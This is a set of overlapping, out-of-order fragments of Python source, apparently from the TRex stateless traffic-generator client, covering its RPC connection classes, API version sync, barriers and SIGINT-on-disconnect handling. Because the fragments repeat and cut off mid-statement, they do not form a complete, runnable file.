"# API sync V2 rc = self.rpc.transmit(\"api_sync_v2\", params = self.api_ver) self.logger.post_cmd(rc) if not",
"is_connected (self): return (self.state[0] == self.CONNECTED) def is_marked_for_disconnect (self): return self.state[0] == self.MARK_FOR_DISCONNECT",
"client and server versions') return rc # get the API_H and provide it",
"and ((time.time() - self.async.last_data_recv_ts) <= 3) ) def is_connected (self): return (self.state[0] ==",
"signal.SIGINT) def sigint_on_conn_lost_enable (self): ''' when enabled, if connection is lost a SIGINT",
"self.port = port self.rpc_link = JsonRpcClient(self.server, self.port, client) # API handler provided by",
"{'name': 'STL', 'major': 4, 'minor': 1} # low level RPC layer self.rpc =",
"API_H and provide it to the RPC channel from now on self.rpc.api_h =",
"rc: self.disconnect() return rc def barrier (self): ''' executes a barrier when it",
"== self.CONNECTED) def is_marked_for_disconnect (self): return self.state[0] == self.MARK_FOR_DISCONNECT def get_disconnection_cause (self): return",
"any thread can mark the current connection as not valid and will require",
"= server self.port = port self.rpc_link = JsonRpcClient(self.server, self.port, client) # API handler",
"(self): return self.port def connect(self): return self.rpc_link.connect() def disconnect(self): self.api_h = None return",
"disconnection ''' DISCONNECTED = 1 CONNECTED = 2 MARK_FOR_DISCONNECT = 3 def __init__",
"self.conn_info['sync_port'], self.conn_info['virtual'], client) self.async = CTRexAsyncClient(self.conn_info['server'], self.conn_info['async_port'], client) # save pointers self.conn_info =",
"finally: self.state = (self.DISCONNECTED, None) def connect (self): ''' connect to the server",
"= self.rpc.connect() if not rc: return rc # API sync V2 rc =",
"and server versions') return rc # get the API_H and provide it to",
"the server must be called after all the config was done ''' return",
"sync channel self.logger.pre_cmd(\"Connecting to RPC server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['sync_port'])) rc = self.rpc.connect() if",
"= 0): return self.rpc_link.invoke_rpc_method(method_name, params, self.api_h, retry = retry) def transmit_batch(self, batch_list, retry",
"''' return ( self.async.last_data_recv_ts is not None and ((time.time() - self.async.last_data_recv_ts) <= 3)",
"rc = self.__connect() if not rc: self.disconnect() return rc def barrier (self): '''",
"an async barrier is guaranteed ''' return self.async.barrier() def sync (self): ''' fully",
"reconnect ''' # avoid any messages handling for the async thread self.async.set_as_zombie() #",
"get_port (self): return self.port def connect(self): return self.rpc_link.connect() def disconnect(self): self.api_h = None",
"fully sync the client with the server must be called after all the",
"multithread safe call any thread can mark the current connection as not valid",
"V2 rc = self.rpc.transmit(\"api_sync_v2\", params = self.api_ver) self.logger.post_cmd(rc) if not rc: # api_sync_v2",
"disable SIGINT dispatching on case of connection lost ''' self.sigint_on_conn_lost = False def",
"the last 3 seconds ''' return ( self.async.last_data_recv_ts is not None and ((time.time()",
"be sent to the main thread # causing the ZMQ RPC to stop",
"to reconnect ''' # avoid any messages handling for the async thread self.async.set_as_zombie()",
"''' disable SIGINT dispatching on case of connection lost ''' self.sigint_on_conn_lost = False",
"''' # avoid any messages handling for the async thread self.async.set_as_zombie() # change",
"with the sync channel self.logger.pre_cmd(\"Connecting to RPC server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['sync_port'])) rc =",
"class CCommLink(object): \"\"\"Describes the connectivity of the stateless client method\"\"\" def __init__(self, server=\"localhost\",",
"disconnect (self): ''' disconnect from both channels sync and async ''' try: self.rpc.disconnect()",
"seconds ''' return ( self.async.last_data_recv_ts is not None and ((time.time() - self.async.last_data_recv_ts) <=",
"= conn_info self.logger = logger self.sigint_on_conn_lost = False # API classes self.api_ver =",
"enabled, if connection is lost a SIGINT will be sent to the main",
"__connect (self): ''' connect to the server (two channels) ''' # start with",
"between client and server versions') return rc # get the API_H and provide",
"can mark the current connection as not valid and will require the main",
"os ############################ RPC layer ############################# ############################ ############################# ############################ ############################# class CCommLink(object): \"\"\"Describes the",
"the server in the last 3 seconds ''' return ( self.async.last_data_recv_ts is not",
"rc: # api_sync_v2 is not present in v2.30 and older if rc.errno() ==",
"require the main thread to reconnect ''' # avoid any messages handling for",
"= True def sigint_on_conn_lost_disable (self): ''' disable SIGINT dispatching on case of connection",
"self.port, client) # API handler provided by the server self.api_h = None def",
"############################ RPC layer ############################# ############################ ############################# ############################ ############################# class CCommLink(object): \"\"\"Describes the connectivity",
"the client with the server must be called after all the config was",
"get_server (self): return self.server def get_port (self): return self.port def connect(self): return self.rpc_link.connect()",
"to RPC server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['sync_port'])) rc = self.rpc.connect() if not rc: return",
"not rc: return rc # API sync V2 rc = self.rpc.transmit(\"api_sync_v2\", params =",
"return self.state[0] == self.MARK_FOR_DISCONNECT def get_disconnection_cause (self): return self.state[1] ########## private ################ def",
"rc = self.rpc.transmit(\"api_sync_v2\", params = self.api_ver) self.logger.post_cmd(rc) if not rc: # api_sync_v2 is",
"{0}:{1}\".format(self.conn_info['server'], self.conn_info['sync_port'])) rc = self.rpc.connect() if not rc: return rc # API sync",
"be called after all the config was done ''' return self.async.barrier(baseline = True)",
"or marked for disconnection ''' DISCONNECTED = 1 CONNECTED = 2 MARK_FOR_DISCONNECT =",
"the server (two channels) ''' # start with the sync channel self.logger.pre_cmd(\"Connecting to",
"connection to the server connection state object describes the connection to the server",
"(two channels) ''' # first disconnect if already connected if self.is_connected(): self.disconnect() #",
"in v2.30 and older if rc.errno() == JsonRpcErrNo.MethodNotSupported: return RC_ERR('Mismatch between client and",
"not present in v2.30 and older if rc.errno() == JsonRpcErrNo.MethodNotSupported: return RC_ERR('Mismatch between",
"SIGINT will be sent to the main thread # causing the ZMQ RPC",
"sent to the main thread # causing the ZMQ RPC to stop what",
"channels sync and async ''' try: self.rpc.disconnect() self.async.disconnect() finally: self.state = (self.DISCONNECTED, None)",
"a barrier when it retruns, an async barrier is guaranteed ''' return self.async.barrier()",
"the async thread self.async.set_as_zombie() # change state self.state = (self.MARK_FOR_DISCONNECT, cause) # if",
"connection as not valid and will require the main thread to reconnect '''",
"''' self.sigint_on_conn_lost = True def sigint_on_conn_lost_disable (self): ''' disable SIGINT dispatching on case",
"after all the config was done ''' return self.async.barrier(baseline = True) def mark_for_disconnect",
"barrier when it retruns, an async barrier is guaranteed ''' return self.async.barrier() def",
"state can be either fully disconnected, fully connected or marked for disconnection '''",
"batch_list: batch.add(command.method, command.params, self.api_h) # invoke the batch return batch.invoke(retry = retry) class",
"True) def mark_for_disconnect (self, cause): ''' A multithread safe call any thread can",
"sync the client with the server must be called after all the config",
"of connection lost ''' self.sigint_on_conn_lost = False def is_alive (self): ''' return True",
"barrier (self): ''' executes a barrier when it retruns, an async barrier is",
"pointers self.conn_info = conn_info # init state self.state = (self.DISCONNECTED, None) def disconnect",
"'minor': 1} # low level RPC layer self.rpc = CCommLink(self.conn_info['server'], self.conn_info['sync_port'], self.conn_info['virtual'], client)",
"rc.errno() == JsonRpcErrNo.MethodNotSupported: return RC_ERR('Mismatch between client and server versions') return rc #",
"the sync channel self.logger.pre_cmd(\"Connecting to RPC server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['sync_port'])) rc = self.rpc.connect()",
"# connect rc = self.__connect() if not rc: self.disconnect() return rc def barrier",
"return rc # get the API_H and provide it to the RPC channel",
"connect rc = self.__connect() if not rc: self.disconnect() return rc def barrier (self):",
"rc def barrier (self): ''' executes a barrier when it retruns, an async",
"(self): ''' executes a barrier when it retruns, an async barrier is guaranteed",
"self.state[1] ########## private ################ def __connect (self): ''' connect to the server (two",
"############################# ############################ ############################# ############################ ############################# class CCommLink(object): \"\"\"Describes the connectivity of the stateless",
"self.sigint_on_conn_lost: os.kill(os.getpid(), signal.SIGINT) def sigint_on_conn_lost_enable (self): ''' when enabled, if connection is lost",
"''' Manages that connection to the server connection state object describes the connection",
"= JsonRpcClient(self.server, self.port, client) # API handler provided by the server self.api_h =",
"retruns, an async barrier is guaranteed ''' return self.async.barrier() def sync (self): '''",
"avoid any messages handling for the async thread self.async.set_as_zombie() # change state self.state",
"method_name, params = None, retry = 0): return self.rpc_link.invoke_rpc_method(method_name, params, self.api_h, retry =",
"self.rpc_link.disconnect() def transmit(self, method_name, params = None, retry = 0): return self.rpc_link.invoke_rpc_method(method_name, params,",
".trex_stl_async_client import CTRexAsyncClient import time import signal import os ############################ RPC layer #############################",
"conn_info # init state self.state = (self.DISCONNECTED, None) def disconnect (self): ''' disconnect",
"to publisher server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['async_port'])) rc = self.async.connect() self.logger.post_cmd(rc) if not rc:",
"def barrier (self): ''' executes a barrier when it retruns, an async barrier",
"(self): ''' connect to the server (two channels) ''' # first disconnect if",
"present in v2.30 and older if rc.errno() == JsonRpcErrNo.MethodNotSupported: return RC_ERR('Mismatch between client",
"has arrived the server in the last 3 seconds ''' return ( self.async.last_data_recv_ts",
"return ( self.async.last_data_recv_ts is not None and ((time.time() - self.async.last_data_recv_ts) <= 3) )",
"def disconnect (self): ''' disconnect from both channels sync and async ''' try:",
"self.logger = logger self.sigint_on_conn_lost = False # API classes self.api_ver = {'name': 'STL',",
"3 seconds ''' return ( self.async.last_data_recv_ts is not None and ((time.time() - self.async.last_data_recv_ts)",
"self.api_h, retry = retry) def transmit_batch(self, batch_list, retry = 0): batch = self.rpc_link.create_batch()",
"self.CONNECTED) def is_marked_for_disconnect (self): return self.state[0] == self.MARK_FOR_DISCONNECT def get_disconnection_cause (self): return self.state[1]",
"it retruns, an async barrier is guaranteed ''' return self.async.barrier() def sync (self):",
"port self.rpc_link = JsonRpcClient(self.server, self.port, client) # API handler provided by the server",
"connection lost ''' self.sigint_on_conn_lost = False def is_alive (self): ''' return True if",
"fully disconnected, fully connected or marked for disconnection ''' DISCONNECTED = 1 CONNECTED",
"False # API classes self.api_ver = {'name': 'STL', 'major': 4, 'minor': 1} #",
"as JsonRpcErrNo from .trex_stl_async_client import CTRexAsyncClient import time import signal import os ############################",
"API sync V2 rc = self.rpc.transmit(\"api_sync_v2\", params = self.api_ver) self.logger.post_cmd(rc) if not rc:",
"self.is_connected(): self.disconnect() # connect rc = self.__connect() if not rc: self.disconnect() return rc",
"( self.async.last_data_recv_ts is not None and ((time.time() - self.async.last_data_recv_ts) <= 3) ) def",
"batch_list, retry = 0): batch = self.rpc_link.create_batch() for command in batch_list: batch.add(command.method, command.params,",
"############################# class CCommLink(object): \"\"\"Describes the connectivity of the stateless client method\"\"\" def __init__(self,",
"self.MARK_FOR_DISCONNECT def get_disconnection_cause (self): return self.state[1] ########## private ################ def __connect (self): '''",
"was done ''' return self.async.barrier(baseline = True) def mark_for_disconnect (self, cause): ''' A",
"return rc def barrier (self): ''' executes a barrier when it retruns, an",
"data has arrived the server in the last 3 seconds ''' return (",
"rc # get the API_H and provide it to the RPC channel from",
"params, self.api_h, retry = retry) def transmit_batch(self, batch_list, retry = 0): batch =",
"sync (self): ''' fully sync the client with the server must be called",
"''' self.sigint_on_conn_lost = False def is_alive (self): ''' return True if any data",
"<= 3) ) def is_connected (self): return (self.state[0] == self.CONNECTED) def is_marked_for_disconnect (self):",
"if connection is lost a SIGINT will be sent to the main thread",
"layer self.rpc = CCommLink(self.conn_info['server'], self.conn_info['sync_port'], self.conn_info['virtual'], client) self.async = CTRexAsyncClient(self.conn_info['server'], self.conn_info['async_port'], client) #",
"def sigint_on_conn_lost_enable (self): ''' when enabled, if connection is lost a SIGINT will",
"self.async.barrier(baseline = True) def mark_for_disconnect (self, cause): ''' A multithread safe call any",
"self.api_ver) self.logger.post_cmd(rc) if not rc: # api_sync_v2 is not present in v2.30 and",
"main thread # causing the ZMQ RPC to stop what it's doing and",
"config was done ''' return self.async.barrier(baseline = True) def mark_for_disconnect (self, cause): '''",
".trex_stl_types import * from .trex_stl_jsonrpc_client import JsonRpcClient, BatchMessage, ErrNo as JsonRpcErrNo from .trex_stl_async_client",
"rc.data()['api_h'] # connect async channel self.logger.pre_cmd(\"Connecting to publisher server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['async_port'])) rc",
"connect to the server (two channels) ''' # first disconnect if already connected",
"return rc # API sync V2 rc = self.rpc.transmit(\"api_sync_v2\", params = self.api_ver) self.logger.post_cmd(rc)",
"causing the ZMQ RPC to stop what it's doing and report an error",
"a SIGINT will be sent to the main thread # causing the ZMQ",
"return True if any data has arrived the server in the last 3",
"(self): ''' return True if any data has arrived the server in the",
"(self): return self.server def get_port (self): return self.port def connect(self): return self.rpc_link.connect() def",
"self.conn_info['sync_port'])) rc = self.rpc.connect() if not rc: return rc # API sync V2",
"any messages handling for the async thread self.async.set_as_zombie() # change state self.state =",
"and will require the main thread to reconnect ''' # avoid any messages",
"the stateless client method\"\"\" def __init__(self, server=\"localhost\", port=5050, virtual=False, client = None): self.server",
"A multithread safe call any thread can mark the current connection as not",
"import signal import os ############################ RPC layer ############################# ############################ ############################# ############################ ############################# class",
"either fully disconnected, fully connected or marked for disconnection ''' DISCONNECTED = 1",
"# first disconnect if already connected if self.is_connected(): self.disconnect() # connect rc =",
"change state self.state = (self.MARK_FOR_DISCONNECT, cause) # if the flag is on, a",
"if already connected if self.is_connected(): self.disconnect() # connect rc = self.__connect() if not",
"# save pointers self.conn_info = conn_info # init state self.state = (self.DISCONNECTED, None)",
"############################ ############################# ############################ ############################# class CCommLink(object): \"\"\"Describes the connectivity of the stateless client",
"state self.state = (self.MARK_FOR_DISCONNECT, cause) # if the flag is on, a SIGINT",
"{0}:{1}\".format(self.conn_info['server'], self.conn_info['async_port'])) rc = self.async.connect() self.logger.post_cmd(rc) if not rc: return rc self.state =",
"JsonRpcErrNo.MethodNotSupported: return RC_ERR('Mismatch between client and server versions') return rc # get the",
"is on, a SIGINT will be sent to the main thread # causing",
"ZMQ RPC to stop what it's doing and report an error if self.sigint_on_conn_lost:",
"when it retruns, an async barrier is guaranteed ''' return self.async.barrier() def sync",
"state self.state = (self.DISCONNECTED, None) def disconnect (self): ''' disconnect from both channels",
"describes the connection to the server state can be either fully disconnected, fully",
"* from .trex_stl_jsonrpc_client import JsonRpcClient, BatchMessage, ErrNo as JsonRpcErrNo from .trex_stl_async_client import CTRexAsyncClient",
"''' fully sync the client with the server must be called after all",
"self.logger.pre_cmd(\"Connecting to publisher server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['async_port'])) rc = self.async.connect() self.logger.post_cmd(rc) if not",
"the connection to the server state can be either fully disconnected, fully connected",
"sync and async ''' try: self.rpc.disconnect() self.async.disconnect() finally: self.state = (self.DISCONNECTED, None) def",
"def __init__(self, server=\"localhost\", port=5050, virtual=False, client = None): self.server = server self.port =",
"# low level RPC layer self.rpc = CCommLink(self.conn_info['server'], self.conn_info['sync_port'], self.conn_info['virtual'], client) self.async =",
"# API classes self.api_ver = {'name': 'STL', 'major': 4, 'minor': 1} # low",
"'STL', 'major': 4, 'minor': 1} # low level RPC layer self.rpc = CCommLink(self.conn_info['server'],",
"client) # API handler provided by the server self.api_h = None def get_server",
"on self.rpc.api_h = rc.data()['api_h'] # connect async channel self.logger.pre_cmd(\"Connecting to publisher server on",
"############################# ############################ ############################# class CCommLink(object): \"\"\"Describes the connectivity of the stateless client method\"\"\"",
"cause) # if the flag is on, a SIGINT will be sent to",
"sync V2 rc = self.rpc.transmit(\"api_sync_v2\", params = self.api_ver) self.logger.post_cmd(rc) if not rc: #",
"not None and ((time.time() - self.async.last_data_recv_ts) <= 3) ) def is_connected (self): return",
"if rc.errno() == JsonRpcErrNo.MethodNotSupported: return RC_ERR('Mismatch between client and server versions') return rc",
"JsonRpcErrNo from .trex_stl_async_client import CTRexAsyncClient import time import signal import os ############################ RPC",
"get_disconnection_cause (self): return self.state[1] ########## private ################ def __connect (self): ''' connect to",
"both channels sync and async ''' try: self.rpc.disconnect() self.async.disconnect() finally: self.state = (self.DISCONNECTED,",
"lost ''' self.sigint_on_conn_lost = False def is_alive (self): ''' return True if any",
"to the RPC channel from now on self.rpc.api_h = rc.data()['api_h'] # connect async",
"from .trex_stl_types import * from .trex_stl_jsonrpc_client import JsonRpcClient, BatchMessage, ErrNo as JsonRpcErrNo from",
"is guaranteed ''' return self.async.barrier() def sync (self): ''' fully sync the client",
"channel self.logger.pre_cmd(\"Connecting to RPC server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['sync_port'])) rc = self.rpc.connect() if not",
"low level RPC layer self.rpc = CCommLink(self.conn_info['server'], self.conn_info['sync_port'], self.conn_info['virtual'], client) self.async = CTRexAsyncClient(self.conn_info['server'],",
"if self.is_connected(): self.disconnect() # connect rc = self.__connect() if not rc: self.disconnect() return",
"not rc: self.disconnect() return rc def barrier (self): ''' executes a barrier when",
"########## private ################ def __connect (self): ''' connect to the server (two channels)",
"server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['async_port'])) rc = self.async.connect() self.logger.post_cmd(rc) if not rc: return rc",
"self.rpc.connect() if not rc: return rc # API sync V2 rc = self.rpc.transmit(\"api_sync_v2\",",
"batch = self.rpc_link.create_batch() for command in batch_list: batch.add(command.method, command.params, self.api_h) # invoke the",
"a SIGINT will be sent to the main thread ''' self.sigint_on_conn_lost = True",
"server=\"localhost\", port=5050, virtual=False, client = None): self.server = server self.port = port self.rpc_link",
"batch.invoke(retry = retry) class Connection(object): ''' Manages that connection to the server connection",
"import JsonRpcClient, BatchMessage, ErrNo as JsonRpcErrNo from .trex_stl_async_client import CTRexAsyncClient import time import",
"batch return batch.invoke(retry = retry) class Connection(object): ''' Manages that connection to the",
"= self.async.connect() self.logger.post_cmd(rc) if not rc: return rc self.state = (self.CONNECTED, None) return",
"BatchMessage, ErrNo as JsonRpcErrNo from .trex_stl_async_client import CTRexAsyncClient import time import signal import",
"client method\"\"\" def __init__(self, server=\"localhost\", port=5050, virtual=False, client = None): self.server = server",
"self.rpc.disconnect() self.async.disconnect() finally: self.state = (self.DISCONNECTED, None) def connect (self): ''' connect to",
"= True) def mark_for_disconnect (self, cause): ''' A multithread safe call any thread",
"dispatching on case of connection lost ''' self.sigint_on_conn_lost = False def is_alive (self):",
"self.api_h = None def get_server (self): return self.server def get_port (self): return self.port",
"batch.add(command.method, command.params, self.api_h) # invoke the batch return batch.invoke(retry = retry) class Connection(object):",
"thread # causing the ZMQ RPC to stop what it's doing and report",
"the RPC channel from now on self.rpc.api_h = rc.data()['api_h'] # connect async channel",
"= (self.DISCONNECTED, None) def disconnect (self): ''' disconnect from both channels sync and",
"MARK_FOR_DISCONNECT = 3 def __init__ (self, conn_info, logger, client): self.conn_info = conn_info self.logger",
"CTRexAsyncClient import time import signal import os ############################ RPC layer ############################# ############################ #############################",
"level RPC layer self.rpc = CCommLink(self.conn_info['server'], self.conn_info['sync_port'], self.conn_info['virtual'], client) self.async = CTRexAsyncClient(self.conn_info['server'], self.conn_info['async_port'],",
"''' disconnect from both channels sync and async ''' try: self.rpc.disconnect() self.async.disconnect() finally:",
"self.async.barrier() def sync (self): ''' fully sync the client with the server must",
"RPC channel from now on self.rpc.api_h = rc.data()['api_h'] # connect async channel self.logger.pre_cmd(\"Connecting",
"def get_port (self): return self.port def connect(self): return self.rpc_link.connect() def disconnect(self): self.api_h =",
"params = self.api_ver) self.logger.post_cmd(rc) if not rc: # api_sync_v2 is not present in",
"transmit_batch(self, batch_list, retry = 0): batch = self.rpc_link.create_batch() for command in batch_list: batch.add(command.method,",
"return self.port def connect(self): return self.rpc_link.connect() def disconnect(self): self.api_h = None return self.rpc_link.disconnect()",
"''' when enabled, if connection is lost a SIGINT will be sent to",
"will be sent to the main thread ''' self.sigint_on_conn_lost = True def sigint_on_conn_lost_disable",
"= False def is_alive (self): ''' return True if any data has arrived",
"(self.DISCONNECTED, None) def connect (self): ''' connect to the server (two channels) '''",
"= retry) class Connection(object): ''' Manages that connection to the server connection state",
"client) # save pointers self.conn_info = conn_info # init state self.state = (self.DISCONNECTED,",
"(self): ''' when enabled, if connection is lost a SIGINT will be sent",
"command in batch_list: batch.add(command.method, command.params, self.api_h) # invoke the batch return batch.invoke(retry =",
"already connected if self.is_connected(): self.disconnect() # connect rc = self.__connect() if not rc:",
"channel self.logger.pre_cmd(\"Connecting to publisher server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['async_port'])) rc = self.async.connect() self.logger.post_cmd(rc) if",
"return self.rpc_link.connect() def disconnect(self): self.api_h = None return self.rpc_link.disconnect() def transmit(self, method_name, params",
"# causing the ZMQ RPC to stop what it's doing and report an",
"the batch return batch.invoke(retry = retry) class Connection(object): ''' Manages that connection to",
"''' # start with the sync channel self.logger.pre_cmd(\"Connecting to RPC server on {0}:{1}\".format(self.conn_info['server'],",
"Connection(object): ''' Manages that connection to the server connection state object describes the",
"def is_alive (self): ''' return True if any data has arrived the server",
"self.conn_info['async_port'], client) # save pointers self.conn_info = conn_info # init state self.state =",
"\"\"\"Describes the connectivity of the stateless client method\"\"\" def __init__(self, server=\"localhost\", port=5050, virtual=False,",
"= self.api_ver) self.logger.post_cmd(rc) if not rc: # api_sync_v2 is not present in v2.30",
"when enabled, if connection is lost a SIGINT will be sent to the",
"# connect async channel self.logger.pre_cmd(\"Connecting to publisher server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['async_port'])) rc =",
"current connection as not valid and will require the main thread to reconnect",
"= (self.MARK_FOR_DISCONNECT, cause) # if the flag is on, a SIGINT will be",
"self.async.set_as_zombie() # change state self.state = (self.MARK_FOR_DISCONNECT, cause) # if the flag is",
"connection to the server state can be either fully disconnected, fully connected or",
"(self): ''' disable SIGINT dispatching on case of connection lost ''' self.sigint_on_conn_lost =",
"= 0): batch = self.rpc_link.create_batch() for command in batch_list: batch.add(command.method, command.params, self.api_h) #",
"safe call any thread can mark the current connection as not valid and",
"signal import os ############################ RPC layer ############################# ############################ ############################# ############################ ############################# class CCommLink(object):",
"Manages that connection to the server connection state object describes the connection to",
"server connection state object describes the connection to the server state can be",
"logger, client): self.conn_info = conn_info self.logger = logger self.sigint_on_conn_lost = False # API",
"and provide it to the RPC channel from now on self.rpc.api_h = rc.data()['api_h']",
") def is_connected (self): return (self.state[0] == self.CONNECTED) def is_marked_for_disconnect (self): return self.state[0]",
"connection state object describes the connection to the server state can be either",
"# init state self.state = (self.DISCONNECTED, None) def disconnect (self): ''' disconnect from",
"1} # low level RPC layer self.rpc = CCommLink(self.conn_info['server'], self.conn_info['sync_port'], self.conn_info['virtual'], client) self.async",
"to the server state can be either fully disconnected, fully connected or marked",
".trex_stl_jsonrpc_client import JsonRpcClient, BatchMessage, ErrNo as JsonRpcErrNo from .trex_stl_async_client import CTRexAsyncClient import time",
"return self.rpc_link.invoke_rpc_method(method_name, params, self.api_h, retry = retry) def transmit_batch(self, batch_list, retry = 0):",
"async channel self.logger.pre_cmd(\"Connecting to publisher server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['async_port'])) rc = self.async.connect() self.logger.post_cmd(rc)",
"the server state can be either fully disconnected, fully connected or marked for",
"self.state = (self.DISCONNECTED, None) def connect (self): ''' connect to the server (two",
"self.server = server self.port = port self.rpc_link = JsonRpcClient(self.server, self.port, client) # API",
"retry) class Connection(object): ''' Manages that connection to the server connection state object",
"sent to the main thread ''' self.sigint_on_conn_lost = True def sigint_on_conn_lost_disable (self): '''",
"self.state = (self.DISCONNECTED, None) def disconnect (self): ''' disconnect from both channels sync",
"v2.30 and older if rc.errno() == JsonRpcErrNo.MethodNotSupported: return RC_ERR('Mismatch between client and server",
"not valid and will require the main thread to reconnect ''' # avoid",
"# start with the sync channel self.logger.pre_cmd(\"Connecting to RPC server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['sync_port']))",
"the connectivity of the stateless client method\"\"\" def __init__(self, server=\"localhost\", port=5050, virtual=False, client",
"server (two channels) ''' # first disconnect if already connected if self.is_connected(): self.disconnect()",
"the server self.api_h = None def get_server (self): return self.server def get_port (self):",
"(self, cause): ''' A multithread safe call any thread can mark the current",
"3) ) def is_connected (self): return (self.state[0] == self.CONNECTED) def is_marked_for_disconnect (self): return",
"on {0}:{1}\".format(self.conn_info['server'], self.conn_info['async_port'])) rc = self.async.connect() self.logger.post_cmd(rc) if not rc: return rc self.state",
"= 2 MARK_FOR_DISCONNECT = 3 def __init__ (self, conn_info, logger, client): self.conn_info =",
"(self): ''' disconnect from both channels sync and async ''' try: self.rpc.disconnect() self.async.disconnect()",
"the server (two channels) ''' # first disconnect if already connected if self.is_connected():",
"guaranteed ''' return self.async.barrier() def sync (self): ''' fully sync the client with",
"an error if self.sigint_on_conn_lost: os.kill(os.getpid(), signal.SIGINT) def sigint_on_conn_lost_enable (self): ''' when enabled, if",
"any data has arrived the server in the last 3 seconds ''' return",
"and async ''' try: self.rpc.disconnect() self.async.disconnect() finally: self.state = (self.DISCONNECTED, None) def connect",
"to the main thread # causing the ZMQ RPC to stop what it's",
"the main thread # causing the ZMQ RPC to stop what it's doing",
"will be sent to the main thread # causing the ZMQ RPC to",
"def __connect (self): ''' connect to the server (two channels) ''' # start",
"save pointers self.conn_info = conn_info # init state self.state = (self.DISCONNECTED, None) def",
"= None def get_server (self): return self.server def get_port (self): return self.port def",
"# if the flag is on, a SIGINT will be sent to the",
"1 CONNECTED = 2 MARK_FOR_DISCONNECT = 3 def __init__ (self, conn_info, logger, client):",
"command.params, self.api_h) # invoke the batch return batch.invoke(retry = retry) class Connection(object): '''",
"provide it to the RPC channel from now on self.rpc.api_h = rc.data()['api_h'] #",
"self.server def get_port (self): return self.port def connect(self): return self.rpc_link.connect() def disconnect(self): self.api_h",
"== self.MARK_FOR_DISCONNECT def get_disconnection_cause (self): return self.state[1] ########## private ################ def __connect (self):",
"can be either fully disconnected, fully connected or marked for disconnection ''' DISCONNECTED",
"connected if self.is_connected(): self.disconnect() # connect rc = self.__connect() if not rc: self.disconnect()",
"classes self.api_ver = {'name': 'STL', 'major': 4, 'minor': 1} # low level RPC",
"self.rpc_link.invoke_rpc_method(method_name, params, self.api_h, retry = retry) def transmit_batch(self, batch_list, retry = 0): batch",
"if self.sigint_on_conn_lost: os.kill(os.getpid(), signal.SIGINT) def sigint_on_conn_lost_enable (self): ''' when enabled, if connection is",
"server state can be either fully disconnected, fully connected or marked for disconnection",
"private ################ def __connect (self): ''' connect to the server (two channels) '''",
"os.kill(os.getpid(), signal.SIGINT) def sigint_on_conn_lost_enable (self): ''' when enabled, if connection is lost a",
"if any data has arrived the server in the last 3 seconds '''",
"start with the sync channel self.logger.pre_cmd(\"Connecting to RPC server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['sync_port'])) rc",
"error if self.sigint_on_conn_lost: os.kill(os.getpid(), signal.SIGINT) def sigint_on_conn_lost_enable (self): ''' when enabled, if connection",
"thread ''' self.sigint_on_conn_lost = True def sigint_on_conn_lost_disable (self): ''' disable SIGINT dispatching on",
"the current connection as not valid and will require the main thread to",
"on, a SIGINT will be sent to the main thread # causing the",
"executes a barrier when it retruns, an async barrier is guaranteed ''' return",
"conn_info, logger, client): self.conn_info = conn_info self.logger = logger self.sigint_on_conn_lost = False #",
"def disconnect(self): self.api_h = None return self.rpc_link.disconnect() def transmit(self, method_name, params = None,",
"retry = 0): return self.rpc_link.invoke_rpc_method(method_name, params, self.api_h, retry = retry) def transmit_batch(self, batch_list,",
"in the last 3 seconds ''' return ( self.async.last_data_recv_ts is not None and",
"publisher server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['async_port'])) rc = self.async.connect() self.logger.post_cmd(rc) if not rc: return",
"retry = retry) def transmit_batch(self, batch_list, retry = 0): batch = self.rpc_link.create_batch() for",
"will require the main thread to reconnect ''' # avoid any messages handling",
"handling for the async thread self.async.set_as_zombie() # change state self.state = (self.MARK_FOR_DISCONNECT, cause)",
"disconnect from both channels sync and async ''' try: self.rpc.disconnect() self.async.disconnect() finally: self.state",
"= conn_info # init state self.state = (self.DISCONNECTED, None) def disconnect (self): '''",
"be either fully disconnected, fully connected or marked for disconnection ''' DISCONNECTED =",
"to the server (two channels) ''' # first disconnect if already connected if",
"= self.__connect() if not rc: self.disconnect() return rc def barrier (self): ''' executes",
"((time.time() - self.async.last_data_recv_ts) <= 3) ) def is_connected (self): return (self.state[0] == self.CONNECTED)",
"retry) def transmit_batch(self, batch_list, retry = 0): batch = self.rpc_link.create_batch() for command in",
"now on self.rpc.api_h = rc.data()['api_h'] # connect async channel self.logger.pre_cmd(\"Connecting to publisher server",
"the config was done ''' return self.async.barrier(baseline = True) def mark_for_disconnect (self, cause):",
"None return self.rpc_link.disconnect() def transmit(self, method_name, params = None, retry = 0): return",
"0): return self.rpc_link.invoke_rpc_method(method_name, params, self.api_h, retry = retry) def transmit_batch(self, batch_list, retry =",
"init state self.state = (self.DISCONNECTED, None) def disconnect (self): ''' disconnect from both",
"it's doing and report an error if self.sigint_on_conn_lost: os.kill(os.getpid(), signal.SIGINT) def sigint_on_conn_lost_enable (self):",
"== JsonRpcErrNo.MethodNotSupported: return RC_ERR('Mismatch between client and server versions') return rc # get",
"is_alive (self): ''' return True if any data has arrived the server in",
"# api_sync_v2 is not present in v2.30 and older if rc.errno() == JsonRpcErrNo.MethodNotSupported:",
"import CTRexAsyncClient import time import signal import os ############################ RPC layer ############################# ############################",
"server in the last 3 seconds ''' return ( self.async.last_data_recv_ts is not None",
"self.disconnect() # connect rc = self.__connect() if not rc: self.disconnect() return rc def",
"flag is on, a SIGINT will be sent to the main thread #",
"############################ ############################# class CCommLink(object): \"\"\"Describes the connectivity of the stateless client method\"\"\" def",
"params = None, retry = 0): return self.rpc_link.invoke_rpc_method(method_name, params, self.api_h, retry = retry)",
"disconnected, fully connected or marked for disconnection ''' DISCONNECTED = 1 CONNECTED =",
"on case of connection lost ''' self.sigint_on_conn_lost = False def is_alive (self): '''",
"from both channels sync and async ''' try: self.rpc.disconnect() self.async.disconnect() finally: self.state =",
"if the flag is on, a SIGINT will be sent to the main",
"invoke the batch return batch.invoke(retry = retry) class Connection(object): ''' Manages that connection",
